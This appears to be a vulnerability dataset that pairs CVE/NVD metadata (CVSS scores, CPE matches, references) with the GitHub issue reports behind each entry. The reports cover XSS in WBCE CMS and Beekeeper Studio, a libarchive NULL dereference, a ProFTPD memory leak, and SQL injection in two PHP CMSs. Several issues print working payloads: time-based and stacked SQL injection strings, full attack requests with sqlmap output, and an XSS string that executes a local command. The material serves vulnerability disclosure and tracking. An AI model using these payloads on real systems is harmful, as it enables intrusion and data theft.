[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:wbce:wbce_cms:*:*:*:*:*:*:*:*", "matchCriteriaId": "5322A587-93A1-48C2-99A5-6E83A8858684", "versionEndExcluding": null, "versionEndIncluding": "1.5.4", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/gozan10/cve/issues/5
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gozan10", "cve" ]
Exploit Title: XSS Stored Vulnerability in WBCE Version: 1.5.4 Date: 04/11/2022 Exploit Author: Gozan Contact: https://github.com/gozan10 Product: WBCE CMS (https://github.com/WBCE/WBCE_CMS) Vendor: WBCE CMS Description: XSS Stored exitst in Section Footer field allow attacker excute arbitrary web script First choose Settings and find Search Settings field then choose button Show Advanced Options. In the section Footer field write payload XSS. ![image](https://user-images.githubusercontent.com/70020521/199878482-34f015af-fd8a-4453-a682-ea655fa0e875.png) After finish click button PC in Pages then type search and press search button ![image](https://user-images.githubusercontent.com/70020521/199878643-1786342a-a79b-4735-bb93-0e43d48c44fe.png) Excute javascript code ![image](https://user-images.githubusercontent.com/70020521/199878757-1ac1d482-30a6-4371-9670-76812bf4dd17.png)
CVE WBCE_4
https://api.github.com/repos/gozan10/cve/issues/5/comments
0
2022-11-04T03:27:07Z
2022-11-04T07:41:54Z
https://github.com/gozan10/cve/issues/5
1,435,492,527
5
4,416
CVE-2022-45017
2022-11-21T15:15:12.393
A cross-site scripting (XSS) vulnerability in the Overview Page settings module of WBCE CMS v1.5.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Post Loop field.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.7, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/WBCE/WBCE_CMS" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/WBCE/WBCE_CMS/issues/525" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/gozan10" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/WBCE/WBCE_CMS" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/WBCE/WBCE_CMS/issues/525" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/gozan10" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:wbce:wbce_cms:*:*:*:*:*:*:*:*", "matchCriteriaId": "5322A587-93A1-48C2-99A5-6E83A8858684", "versionEndExcluding": null, "versionEndIncluding": "1.5.4", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/WBCE/WBCE_CMS/issues/525
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "WBCE", "WBCE_CMS" ]
Hi team, I find XSS via modul post loop in Pages Step: 1. add section in manage sections ![image](https://user-images.githubusercontent.com/70020521/200109961-361312f5-6720-47ac-bf18-d746c2081d40.png) ![image](https://user-images.githubusercontent.com/70020521/200109987-777a03c1-3109-4690-ac1c-6d4c852cba6d.png) 2. add new post then choose options in modify page (a new post must be created for the setting to take effect) ![image](https://user-images.githubusercontent.com/70020521/200110051-1aee1570-b421-4e03-a056-bf9fc73d4925.png) ![image](https://user-images.githubusercontent.com/70020521/200110578-46c57f7d-8c85-49f9-b73f-99c0a4bbc2f2.png) 3. In Post Loop inject javascript ![image](https://user-images.githubusercontent.com/70020521/200110303-366e66e0-1cf7-4228-9b65-64a9969cd35b.png) 4. save and view ![image](https://user-images.githubusercontent.com/70020521/200110319-bc77ee05-6d01-4a9b-a716-0a5d4d71b798.png)
XSS via modul post loop in Pages
https://api.github.com/repos/WBCE/WBCE_CMS/issues/525/comments
1
2022-11-05T08:09:29Z
2022-12-03T09:19:10Z
https://github.com/WBCE/WBCE_CMS/issues/525
1,436,896,112
525
4,417
CVE-2022-43143
2022-11-21T21:15:11.600
A cross-site scripting (XSS) vulnerability in Beekeeper Studio v3.6.6 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the error modal container.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.6, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/beekeeper-studio/beekeeper-studio/issues/1393" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/beekeeper-studio/beekeeper-studio/issues/1393" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:beekeeperstudio:beekeeper-studio:3.6.6:*:*:*:*:*:*:*", "matchCriteriaId": "EEE808B7-9E7E-4F47-8726-A9B210429081", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/beekeeper-studio/beekeeper-studio/issues/1393
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "beekeeper-studio", "beekeeper-studio" ]
**Author: [bob11.devranger@gmail.com](mailto:bob11.devranger@gmail.com)** **Date: 2022-10-07** **OS: Windows, Linux, MacOS** **Beekeeper Studio Version: 3.6.6** **DB Type&Version: MySQL 5.7 and 8.0 Also** --- ## Summary It has been possible to trigger remote code execution via Beekeeper’s **Modal Container**. ## Description Beekeeper has the modal container which indicates the user’s interaction is valid and due to a lack of sanitization of the modal contents, It has an XSS vulnerability like this: _[1]_ ![image](https://user-images.githubusercontent.com/42366390/194698702-2522239e-69a5-43d7-bbd7-3de10c09ccae.png) ![image](https://user-images.githubusercontent.com/42366390/194698712-c3ad3b64-61de-49d6-9d2d-7367b503287e.png) _[2]_ ![image](https://user-images.githubusercontent.com/42366390/194698740-09a8538d-f692-4a62-a259-223f551eff49.png) ![image](https://user-images.githubusercontent.com/42366390/194698746-ea894e29-f85f-4d3a-88f1-b9ad767dc90e.png) The modal’s content also is transferred by MySQL packet when only the user’s interaction is invalid like this: ![image](https://user-images.githubusercontent.com/42366390/194698755-111a9ea9-192a-4715-b112-32580be8652e.png) So, Taking advantage of the report in [CVE-2022-26174](https://nvd.nist.gov/vuln/detail/CVE-2022-26174), it has been possible Remote Code Execution via Modal Container. In this case, I made the fake MySQL server which spoofs user’s modal output when the user puts some data in a table. This is my sample fake SQL server : [poc.py](https://github.com/goseungduk/beekeeper/blob/master/poc.py) You can see this poc video that fake SQL server triggers RCE via Beekeeper. [PoC_Video](https://youtu.be/sR411Mczo7w) In this video, I used this XSS script `<input type="text" onfocus="require('child_process').execSync('calc.exe')" autofocus />` for modal error output and any input that user passes is replaced by that XSS script and re-passed to the user. Finally, Malicious Code is triggered in the user’s PC and is continued until the modal is inactivated. ![image](https://user-images.githubusercontent.com/42366390/194698899-d40f7808-ab25-4eba-9f5c-d34ce48365e1.png) ## What’s More? - Not only data inserting functions but also any functions which use error modal(e.g. create table), It seems that we can trigger RCE too. ## Temporary Fake SQL Server `146.56.129.188:3306` - You can do these poc in this fake SQL server with Beekeeper - If you have any problems, contact me via **[a42873410@gmail.com](mailto:a42873410@gmail.com)** or **[bob11.devranger@gmail.com](mailto:bob11.devranger@gmail.com)** - Thank You :)
BUG: Beekeeper Remote Code Execution via XSS
https://api.github.com/repos/beekeeper-studio/beekeeper-studio/issues/1393/comments
2
2022-10-08T08:52:49Z
2022-11-21T15:46:13Z
https://github.com/beekeeper-studio/beekeeper-studio/issues/1393
1,401,877,047
1,393
4,418
CVE-2022-36227
2022-11-22T02:15:11.003
In libarchive before 3.6.2, the software does not check for an error after calling calloc function that can return with a NULL pointer if the function fails, which leads to a resultant NULL pointer dereference. NOTE: the discoverer cites this CWE-476 remark but third parties dispute the code-execution impact: "In rare circumstances, when NULL is equivalent to the 0x0 memory address and privileged code can access it, then writing or reading memory is possible, which may lead to code execution."
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://bugs.gentoo.org/882521" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/libarchive/libarchive/blob/v3.0.0a/libarchive/archive_write.c#L215" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/libarchive/libarchive/issues/1754" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2023/01/msg00034.html" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/V67OO2UUQAUJS3IK4JZPF6F3LUCBU6IS/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202309-14" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://bugs.gentoo.org/882521" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/libarchive/libarchive/blob/v3.0.0a/libarchive/archive_write.c#L215" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/libarchive/libarchive/issues/1754" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2023/01/msg00034.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/V67OO2UUQAUJS3IK4JZPF6F3LUCBU6IS/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202309-14" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libarchive:libarchive:*:*:*:*:*:*:*:*", "matchCriteriaId": "89B15E48-C18C-4FD9-8797-BBA59F4E3C3B", "versionEndExcluding": "3.6.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "3.0.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:37:*:*:*:*:*:*:*", "matchCriteriaId": "E30D0E6F-4AE8-4284-8716-991DFA48CC5D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:splunk:universal_forwarder:*:*:*:*:*:*:*:*", "matchCriteriaId": "5722E753-75DE-4944-A11B-556CB299B57D", "versionEndExcluding": "8.2.12", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "8.2.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:splunk:universal_forwarder:*:*:*:*:*:*:*:*", "matchCriteriaId": "DC0F9351-81A4-4FEA-B6B5-6E960A933D32", "versionEndExcluding": "9.0.6", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "9.0.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:splunk:universal_forwarder:9.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "EED24E67-2957-4C1B-8FEA-E2D2FE7B97FC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/libarchive/libarchive/issues/1754
[ "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "libarchive", "libarchive" ]
The software does not check for an error after calling `calloc` function that can return with a NULL pointer if the function fails, which leads to a resultant NULL pointer dereference or, in some cases, even arbitrary code execution. The vulnerability is here: ``` f = calloc(1, sizeof(*f)); f->archive = _a; f->state = ARCHIVE_WRITE_FILTER_STATE_NEW; ``` In this file: libarchive/archive_write.c ``` /* * Allocate and return the next filter structure. */ struct archive_write_filter * __archive_write_allocate_filter(struct archive *_a) { struct archive_write *a = (struct archive_write *)_a; struct archive_write_filter *f; f = calloc(1, sizeof(*f)); f->archive = _a; f->state = ARCHIVE_WRITE_FILTER_STATE_NEW; if (a->filter_first == NULL) a->filter_first = f; else a->filter_last->next_filter = f; a->filter_last = f; return f; } ```
There is a NULL pointer dereference vulnerability
https://api.github.com/repos/libarchive/libarchive/issues/1754/comments
9
2022-07-11T06:25:04Z
2023-02-21T07:36:29Z
https://github.com/libarchive/libarchive/issues/1754
1,300,264,871
1,754
4,419
CVE-2021-46854
2022-11-23T07:15:09.057
mod_radius in ProFTPD before 1.3.7c allows memory disclosure to RADIUS servers because it copies blocks of 16 characters.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Release Notes", "Vendor Advisory" ], "url": "http://www.proftpd.org/docs/RELEASE_NOTES-1.3.7e" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugs.gentoo.org/811495" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/proftpd/proftpd/issues/1284" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/proftpd/proftpd/pull/1285" }, { "source": "cve@mitre.org", "tags": null, "url": "https://security.gentoo.org/glsa/202305-03" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Vendor Advisory" ], "url": "http://www.proftpd.org/docs/RELEASE_NOTES-1.3.7e" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugs.gentoo.org/811495" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/proftpd/proftpd/issues/1284" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/proftpd/proftpd/pull/1285" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://security.gentoo.org/glsa/202305-03" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:proftpd:proftpd:*:*:*:*:*:*:*:*", "matchCriteriaId": "D1FF45EB-7C4A-4CBF-A03B-661546B087E7", "versionEndExcluding": "1.3.7c", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "401" ]
401
https://github.com/proftpd/proftpd/issues/1284
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "proftpd", "proftpd" ]
### What I Did We have noticed a disclosure of memory contents from mod_radius to RADIUS servers. mod_radius copies the client-supplied password into a temporary buffer to encrypt it with the RADIUS shared secret. However, it does so obeying some padding rules: i.e. it is expected that the password has a length multiple of 16. If the password length is _not_ an exact multiple, mod_radius still copies the "rounded up" count of bytes from the password buffer into the temporary buffer, thereby leaking whatever happens to occur past the actual password. For FTP session, this often seems to be a copy of the password, preceded by some 0 bytes, and tailed by some garbage. We have not evaluated if SFTP sessions may leak other secrets. This can be reproduced very well with very short passwords. From a FreeRADIUS radiusd debug log, you can observe the duplication of the password "12345" here: (0) Received Access-Request Id 94 from 10.12.16.61:24712 to 10.12.16.26:1812 length 133 (0) User-Name = "test@realm.ch" (0) User-Password = "012345\000\000012345\000d" (0) NAS-Identifier = "ftp" (0) NAS-IP-Address = 10.12.16.61 (0) NAS-Port = 21 (0) NAS-Port-Type = Virtual ### What I Expected/Wanted proftpd should send *just* the user password, and nothing else. ### ProFTPD Version and Configuration I've specifically tested this with 1.3.3c (from source), 1.3.6-4+deb10u5 (from Debian) and git cba3a1aaaa264e2926fea16c7d9cef4fa8f6e323.
mod_radius: memory disclosure to radius server
https://api.github.com/repos/proftpd/proftpd/issues/1284/comments
1
2021-08-04T18:06:14Z
2021-08-05T03:16:31Z
https://github.com/proftpd/proftpd/issues/1284
960,816,974
1,284
4,420
CVE-2021-35284
2022-11-23T18:15:11.063
SQL Injection vulnerability in function get_user in login_manager.php in rizalafani cms-php v1.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/rizalafani/cms-php/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/rizalafani/cms-php/issues/1" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cms-php_project:cms-php:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "AA4C1813-639F-4FF1-B4ED-E70CC588103D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/rizalafani/cms-php/issues/1
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "rizalafani", "cms-php" ]
Login page : login.php judge : login_manager.php function : get_user() `function.php` Execute SQL query ``` function get_user($where = ""){ $koneksi = connection(); $data = mysql_query("select * from userapp $where;") or die ("query error"); destroy_connection($koneksi); return to_array($data); ``` ``` username=admin'%2b(select*from(select(sleep(20)))a)%2b'&password=admin ```
Login page SQL injection
https://api.github.com/repos/rizalafani/cms-php/issues/1/comments
0
2021-06-10T05:17:04Z
2021-06-10T05:17:04Z
https://github.com/rizalafani/cms-php/issues/1
916,909,676
1
4,421
CVE-2022-44140
2022-11-23T20:15:10.333
Jizhicms v2.3.3 was discovered to contain a SQL injection vulnerability via the /Member/memberedit.html component.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Cherry-toto/jizhicms/issues/81" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Cherry-toto/jizhicms/issues/81" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jizhicms:jizhicms:2.3.3:*:*:*:*:*:*:*", "matchCriteriaId": "6FDCCC0D-710D-49F8-BBE7-50FC638428E2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/Cherry-toto/jizhicms/issues/81
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "Cherry-toto", "jizhicms" ]
### Issue SQL injection vulnerabilities exist under the function nodes of new members, and attackers can operate on databases ### Steps to reproduce 1. Log in to the background 2. Click User Management>Member List>Add Member or Edit ![image](https://user-images.githubusercontent.com/115956957/196684893-f0745b11-4515-44d7-a6fb-2d2fbc380018.png) ![image](https://user-images.githubusercontent.com/115956957/196685440-faefa3a9-d72e-4053-99b2-2d9c188e5ea6.png) Problematic packets: ``` POST /index.php/admins/Member/memberedit.html HTTP/1.1 Host: 192.168.150.136:85 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 241 Origin: http://192.168.150.136:85 Connection: close Referer: http://192.168.150.136:85/index.php/admins/Member/memberedit/id/1163.html Cookie: Hm_lvt_948dba1e5d873b9c1f1c77078c521c89=1665907862; PHPSESSID=k7nc070b0c4h2f1kjo65l54aqf go=1&id=1163&username=xxxx&openid=&sex=2&gid=0&litpic=&file=&tel=&jifen=0.00&money=0.00&email=&province=&city=&address=&regtime=2022-10-19+19%3A34%3A02&logintime=2022-10-19+19%3A24%3A17&signature=&birthday=&pid=0&isshow=1&pass=&repass=123456 ``` use sqlmap: python2 sqlmap.py -r ss.txt --batch -current-db ![image](https://user-images.githubusercontent.com/115956957/196685797-fe1c68b4-4cef-48da-8bed-6d7317007db2.png) ``` --- Parameter: id (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: go=1&id=1163' AND (SELECT 3004 FROM (SELECT(SLEEP(5)))lPDg) AND 'fgEo'='fgEo&username=xxxx#&openid=&sex=2&gid=0&litpic=&file=&tel=&jifen=0.00&money=0.00&email=&province=&city=&address=&regtime=2022-10-19 19:34:02&logintime=2022-10-19 19:24:17&signature=&birthday=&pid=0&isshow=1&pass=&repass=123456 --- ```
jizhicms v2.3.3 has a vulnerability, SQL injection
https://api.github.com/repos/Cherry-toto/jizhicms/issues/81/comments
2
2022-10-19T12:23:31Z
2022-11-13T04:18:19Z
https://github.com/Cherry-toto/jizhicms/issues/81
1,414,877,565
81
4,422
CVE-2022-45278
2022-11-23T21:15:11.263
Jizhicms v2.3.3 was discovered to contain a SQL injection vulnerability via the /index.php/admins/Fields/get_fields.html component.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Cherry-toto/jizhicms/issues/83" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Cherry-toto/jizhicms/issues/83" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jizhicms:jizhicms:2.3.3:*:*:*:*:*:*:*", "matchCriteriaId": "6FDCCC0D-710D-49F8-BBE7-50FC638428E2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/Cherry-toto/jizhicms/issues/83
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "Cherry-toto", "jizhicms" ]
This is one of my favorite CMS, but I found a system vulnerability. name:jizhicms version: v2.3.3 Installation package [download:](https://github.com/Cherry-toto/jizhicms) ![image](https://user-images.githubusercontent.com/75592724/201055280-15c1038f-c9b6-4645-bc49-f77db146bafc.png) Problematic packets: > POST /index.php/admins/Fields/get_fields.html HTTP/1.1 > Host: 192.168.23.130:49158 > User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0 > Accept: */* > Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 > Accept-Encoding: gzip, deflate > Content-Type: application/x-www-form-urlencoded; charset=UTF-8 > X-Requested-With: XMLHttpRequest > Content-Length: 21 > Origin: http://192.168.23.130:49158 > Connection: close > Referer: http://192.168.23.130:49158/index.php/admins/Extmolds/editmolds/id/1/molds/tags.html > Cookie: PHPSESSID=07lpb0tri05c4fqvd85em8u6rs > > molds=tags&tid=0&id=1 Background ->SEO settings ->TGA list ->edit, and then capture packages ![image](https://user-images.githubusercontent.com/75592724/201058690-e66eb21a-ef71-4881-a0b0-60f51ad9ebec.png) ![image](https://user-images.githubusercontent.com/75592724/201058822-3b947f4f-b6d5-4511-865d-29f2b0f24aa2.png) ![image](https://user-images.githubusercontent.com/75592724/201058391-27036e72-a133-4b74-a083-57a07dbc89eb.png) Vulnerability verification exists payload ``` Parameter: molds (POST) Type: stacked queries Title: MySQL >= 5.0.12 stacked queries (comment) Payload: molds=tags;SELECT SLEEP(5)#&tid=0&id=3 ```
jizhicms v2.3.3 has a vulnerability, SQL injection
https://api.github.com/repos/Cherry-toto/jizhicms/issues/83/comments
1
2022-11-10T09:53:18Z
2022-11-18T08:29:48Z
https://github.com/Cherry-toto/jizhicms/issues/83
1,443,586,440
83
4,423
CVE-2022-45280
2022-11-23T21:15:11.310
A cross-site scripting (XSS) vulnerability in the Url parameter in /login.php of EyouCMS v1.6.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
